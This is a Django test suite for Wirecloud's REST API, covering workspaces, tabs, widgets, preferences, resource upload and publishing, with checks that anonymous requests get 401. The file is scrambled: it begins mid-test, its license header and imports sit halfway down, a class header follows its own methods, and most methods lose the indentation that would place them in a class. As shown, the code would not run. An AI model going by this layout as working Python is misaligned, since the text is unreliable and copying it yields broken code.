self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'ExistingWorkspace')
self.assertEqual(response_data['creator'], 'user_with_workspaces')
self.assertTrue('wiring' in response_data)
self.assertTrue('tabs' in response_data)
self.assertTrue(isinstance(response_data['tabs'], list))
self.assertTrue(len(response_data['tabs']) > 0)
self.assertTrue(isinstance(response_data['tabs'][0], dict))
self.assertTrue('id' in response_data['tabs'][0])
self.assertTrue('name' in response_data['tabs'][0])
self.assertTrue('preferences' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['preferences'], dict))
self.assertTrue('iwidgets' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['iwidgets'], list))
self.assertTrue('preferences' in response_data)
self.assertTrue(isinstance(response_data['preferences'], dict))
def test_workspace_entry_delete_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_delete(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace should be removed
self.assertFalse(Workspace.objects.filter(name='ExistingWorkspace').exists())
def test_workspace_wiring_entry_put_requires_authentication(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
workspace = Workspace.objects.get(id=1)
old_wiring_status = simplejson.loads(workspace.wiringStatus)
data = simplejson.dumps({
'operators': [{'name': 'Operator1'}],
'connections': [],
})
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace wiring status should not have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, old_wiring_status)
# Check using Accept: text/html
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_wiring_entry_put(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
new_wiring_status = {
'operators': [{'name': 'Operator1'}],
'connections': [],
}
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = simplejson.dumps(new_wiring_status)
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace wiring status should have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, new_wiring_status)
def test_tab_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not created
self.assertFalse(Tab.objects.filter(name='rest_api_test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_collection_post(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertEqual(response_data['name'], 'rest_api_test')
# Tab should be created
self.assertTrue(Tab.objects.filter(name='rest_api_test').exists())
def test_tab_collection_post_conflict(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingTab',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_tab_entry_delete_requires_authentication(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not deleted
self.assertTrue(Tab.objects.filter(name='ExistingTab').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_entry_delete(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Tab should be removed
self.assertFalse(Tab.objects.filter(name='ExistingTab').exists())
def test_iwidget_collection_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not created
# TODO
def test_iwidget_collection_post(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_iwidget_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not updated
iwidget = IWidget.objects.get(pk=2)
self.assertNotEqual(iwidget.name, 'New Name')
def test_iwidget_entry_post(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# Check that the iwidget name has been changed
iwidget = IWidget.objects.get(pk=2)
self.assertEqual(iwidget.name, 'New Name')
def test_iwidget_preferences_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget preferences should not be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertNotEqual(variable_value.value, 'new value')
def test_iwidget_preferences_entry_post(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget preferences should be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertEqual(variable_value.value, 'new value')
def test_iwidget_entry_delete_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should not be deleted
IWidget.objects.get(pk=2)
def test_iwidget_entry_delete(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget should be deleted
self.assertRaises(IWidget.DoesNotExist, IWidget.objects.get, pk=2)
class ResourceManagementAPI(WirecloudTestCase):

    """Tests for the resource (widget/operator/mashup) management REST API."""

    fixtures = ('selenium_test_data',)
    # Must be a tuple: ('rest_api') without the trailing comma is just a
    # parenthesized string, which breaks tag-based test selection
    tags = ('rest_api',)

    @classmethod
    def setUpClass(cls):

        super(ResourceManagementAPI, cls).setUpClass()

        cls.client = Client()

        # Replace the real HTTP downloader with one serving files from the
        # local test-data directory, so tests run offline
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })

        # catalogue deployer: deploy uploaded resources into a temp dir
        cls.old_catalogue_deployer = catalogue.wgt_deployer
        cls.catalogue_tmp_dir = mkdtemp()
        catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)

        # showcase deployer: same, for widget deployments
        cls.old_deployer = showcase.wgt_deployer
        cls.showcase_tmp_dir = mkdtemp()
        showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)

    @classmethod
    def tearDownClass(cls):

        # Restore the original downloader
        downloader.download_http_content = cls._original_download_function

        # deployers: restore the saved globals and drop the temp dirs
        catalogue.wgt_deployer = cls.old_catalogue_deployer
        shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
        showcase.wgt_deployer = cls.old_deployer
        shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)

        super(ResourceManagementAPI, cls).tearDownClass()

    def test_resource_collection_read_requires_authentication(self):
        """Anonymous reads of the resource collection are rejected."""

        url = reverse('wirecloud_showcase.resource_collection')

        response = self.client.get(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 401)

    def test_resource_collection_read(self):
        """Authenticated users get a JSON map of well-formed resource entries."""

        url = reverse('wirecloud_showcase.resource_collection')

        self.client.login(username='admin', password='admin')

        response = self.client.get(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        response_data = simplejson.loads(response.content)
        self.assertTrue(isinstance(response_data, dict))
        for resource_id in response_data:
            resource = response_data[resource_id]
            self.assertTrue(isinstance(resource, dict))
            self.assertIn('type', resource)
            self.assertIn(resource['type'], CatalogueResource.RESOURCE_TYPES)
            self.assertIn('vendor', resource)
            self.assertIn('name', resource)
            self.assertIn('version', resource)

    def test_resource_collection_post_requires_authentication(self):
        """Anonymous resource uploads are rejected."""

        url = reverse('wirecloud_showcase.resource_collection')

        response = self.client.post(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 401)

    def test_resource_collection_post(self):
        """A WGT file uploaded as multipart form data is installed."""

        url = reverse('wirecloud_showcase.resource_collection')

        # Authenticate
        self.client.login(username='admin', password='admin')

        # Make the request
        with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
            response = self.client.post(url, data={'file': f}, HTTP_ACCEPT='application/json')

        self.assertEqual(response.status_code, 201)
        response_data = simplejson.loads(response.content)
        self.assertTrue(isinstance(response_data, dict))
        self.assertIn('type', response_data)
        self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
        self.assertIn('vendor', response_data)
        self.assertIn('name', response_data)
        self.assertIn('version', response_data)

    def test_resource_collection_post_using_octet_stream(self):
        """A WGT file uploaded as a raw octet stream is installed."""

        url = reverse('wirecloud_showcase.resource_collection')

        # Authenticate
        self.client.login(username='admin', password='admin')

        # Make the request
        with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
            response = self.client.post(url, f.read(), content_type="application/octet-stream", HTTP_ACCEPT='application/json')

        self.assertEqual(response.status_code, 201)
        response_data = simplejson.loads(response.content)
        self.assertTrue(isinstance(response_data, dict))
        self.assertIn('type', response_data)
        self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
        self.assertIn('vendor', response_data)
        self.assertIn('name', response_data)
        self.assertIn('version', response_data)

    def test_resource_collection_post_using_octet_stream_error(self):
        """Uploading an invalid octet stream yields 400."""

        url = reverse('wirecloud_showcase.resource_collection')

        # Authenticate
        self.client.login(username='admin', password='admin')

        # Make the request
        response = self.client.post(url, 'invalid content', content_type="application/octet-stream", HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 400)

    def test_resource_entry_read_requires_authentication(self):
        """Anonymous reads of a resource entry are rejected."""

        url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

        response = self.client.get(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 401)

    def test_resource_entry_read(self):
        """An authenticated user can download a deployed resource file."""

        resource_id = [
            'Wirecloud',
            'Test',
            '1.0'
        ]
        url = reverse('wirecloud_showcase.resource_entry', args=resource_id)
        file_name = '_'.join(resource_id) + '.wgt'

        # Deploy the WGT file into the temporary catalogue dir set up by setUpClass
        local_dir = catalogue.wgt_deployer.get_base_dir(*resource_id)
        dst_file = os.path.join(local_dir, file_name)
        if not os.path.exists(local_dir):
            os.makedirs(local_dir)
        src_file = os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt')
        shutil.copy(src_file, dst_file)

        # Authenticate
        self.client.login(username='admin', password='admin')

        # Make the request
        response = self.client.get(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)

    def test_resource_entry_delete_requires_authentication(self):
        """Anonymous resource deletion is rejected."""

        url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

        response = self.client.delete(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 401)

    def test_resource_entry_delete(self):
        """An authenticated user can uninstall a resource."""

        url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})

        self.client.login(username='admin', password='admin')

        response = self.client.delete(url, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 204)
class ExtraApplicationMashupAPI(WirecloudTestCase):
fixtures = ('initial_data', 'selenium_test_data', 'user_with_workspaces')
tags = ('extra_rest_api',)
    @classmethod
    def setUpClass(cls):
        # Run WirecloudTestCase's class-level setup first
        super(ExtraApplicationMashupAPI, cls).setUpClass()
        cls.client = Client()
        # Replace the real HTTP downloader with one that serves files from the
        # local test-data directory, so tests run offline; the original is
        # saved so tearDownClass can restore it
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })
        # catalogue deployer: deploy uploaded resources into a throw-away temp dir
        cls.old_catalogue_deployer = catalogue.wgt_deployer
        cls.catalogue_tmp_dir = mkdtemp()
        catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)
        # showcase deployer: same, for widget deployments
        cls.old_deployer = showcase.wgt_deployer
        cls.showcase_tmp_dir = mkdtemp()
        showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)
    @classmethod
    def tearDownClass(cls):
        # Undo the module-level monkey-patching done in setUpClass
        downloader.download_http_content = cls._original_download_function
        # deployers: restore the saved globals and remove the temp dirs
        catalogue.wgt_deployer = cls.old_catalogue_deployer
        shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
        showcase.wgt_deployer = cls.old_deployer
        shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)
        super(ExtraApplicationMashupAPI, cls).tearDownClass()
def test_iwidget_collection_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_collection_read(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
def test_iwidget_entry_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_entry_read(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_read(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_post(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_read(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_post(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_tab_preference_collection_read_requires_authentication(self):

    """Anonymous GET of tab preferences is rejected with 401."""

    url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

def test_tab_preference_collection_read(self):

    """The workspace owner can read tab preferences as a JSON object."""

    url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

def test_tab_preference_collection_post_requires_authentication(self):

    """Anonymous POST of tab preferences is rejected with 401."""

    url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})

    data = {
        'pref1': {'inherit': 'false', 'value': '5'},
        'pref2': {'inherit': 'true', 'value': 'false'}
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

def test_tab_preference_collection_post(self):

    """The workspace owner can update tab preferences; success is an empty 204."""

    url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # NOTE(review): tab preferences are posted as flat strings here, unlike
    # workspace preferences which use {'inherit': ..., 'value': ...} dicts —
    # presumably both formats are accepted by the view; confirm.
    data = {
        'pref1': '5',
        'pref2': 'true',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 204)
    self.assertEqual(response.content, '')
def test_workspace_publish_requires_authentication(self):

    """Anonymous workspace publication is rejected with 401."""

    url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})

    data = {
        'vendor': 'Wirecloud',
        'name': 'test-published-mashup',
        'version': '1.0.5',
        'email': 'test@example.com'
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

def test_workspace_publish(self):

    """Owners can publish a workspace as a mashup resource (201 Created)."""

    url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    data = {
        'vendor': 'Wirecloud',
        'name': 'test-published-mashup',
        'version': '1.0.5',
        'email': 'test@example.com'
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 201)
def test_workspace_publish_bad_provided_data(self):

    """Invalid publication data (missing fields, bad version) yields 400 with a JSON error body."""

    url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})

    # Authenticate
    self.client.login(username='user_with_workspaces', password='admin')

    # Test missing parameters
    data = {
        'name': ''
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 400)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Test invalid version ('1.0.05' — leading zero in a version component)
    data = {
        'vendor': 'Wirecloud',
        'name': 'test-published-mashup',
        'version': '1.0.05',
        'email': 'test@example.com'
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 400)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))
# Improve workspace collection post tests
# -*- coding: utf-8 -*-
# Copyright 2013 Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
import os
from tempfile import mkdtemp
import shutil
from django.core.urlresolvers import reverse
from django.test import Client
from django.utils import simplejson
from wirecloud.catalogue import utils as catalogue
from wirecloud.catalogue.models import CatalogueResource
import wirecloud.commons.test
from wirecloud.commons.test import LocalDownloader, WirecloudTestCase
from wirecloud.commons.utils import downloader
from wirecloud.commons.utils.wgt import WgtDeployer
from wirecloud.platform.models import IWidget, Tab, VariableValue, Workspace
from wirecloud.platform.widget import utils as showcase
# Prevent nose from collecting these tests twice (they are run through
# wirecloud/platform/tests/__init__.py)
__test__ = False
class ApplicationMashupAPI(WirecloudTestCase):

    """Integration tests for the core Application Mashup REST API."""

    fixtures = ('selenium_test_data', 'user_with_workspaces')
    # FIX: the original ('rest_api') is a plain string, not a tuple — the
    # missing trailing comma makes tag filtering iterate it character by
    # character. The sibling class below uses ('extra_rest_api',) correctly.
    tags = ('rest_api',)

    @classmethod
    def setUpClass(cls):

        super(ApplicationMashupAPI, cls).setUpClass()

        cls.client = Client()

        # Replace the HTTP download function with a local-filesystem stub so
        # the tests never hit the network; the original is restored in
        # tearDownClass.
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })

    @classmethod
    def tearDownClass(cls):

        downloader.download_http_content = cls._original_download_function
        # FIX: call the parent hook, matching ResourceManagementAPI's
        # tearDownClass — the original omitted it, skipping base-class cleanup.
        super(ApplicationMashupAPI, cls).tearDownClass()
def test_features(self):

    """The features endpoint is public and returns a JSON object."""

    response = self.client.get(reverse('wirecloud.features'), HTTP_ACCEPT='application/json')

    self.assertEqual(response.status_code, 200)
    self.assertTrue(isinstance(simplejson.loads(response.content), dict))
def test_workspace_collection_read_requires_authentication(self):

    """Anonymous listing of workspaces is rejected with 401."""

    url = reverse('wirecloud.workspace_collection')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)

def test_workspace_collection_read(self):

    """A logged-in user gets a non-empty JSON list of workspace dicts."""

    url = reverse('wirecloud.workspace_collection')

    self.client.login(username='admin', password='admin')

    response = self.client.get(url, HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 200)
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, list))
    self.assertTrue(isinstance(response_data[0], dict))
def test_workspace_collection_post_requires_authentication(self):

    """Anonymous workspace creation is rejected with 401 and no workspace is created;
    the error body honours the Accept header (JSON vs HTML)."""

    url = reverse('wirecloud.workspace_collection')

    data = {
        'name': 'test',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Error response should be a dict
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
    response_data = simplejson.loads(response.content)
    self.assertTrue(isinstance(response_data, dict))

    # Workspace should not be created
    self.assertFalse(Workspace.objects.filter(name='test').exists())

    # Check using Accept: text/html
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
    self.assertEqual(response.status_code, 401)
    self.assertTrue('WWW-Authenticate' in response)

    # Content type of the response should be text/html
    self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_collection_post(self):

    """A logged-in user can create an empty workspace; response carries id/name/wiring."""

    url = reverse('wirecloud.workspace_collection')

    # Authenticate
    self.client.login(username='admin', password='admin')

    # Make the request
    data = {
        'name': 'test',
    }
    response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
    self.assertEqual(response.status_code, 201)

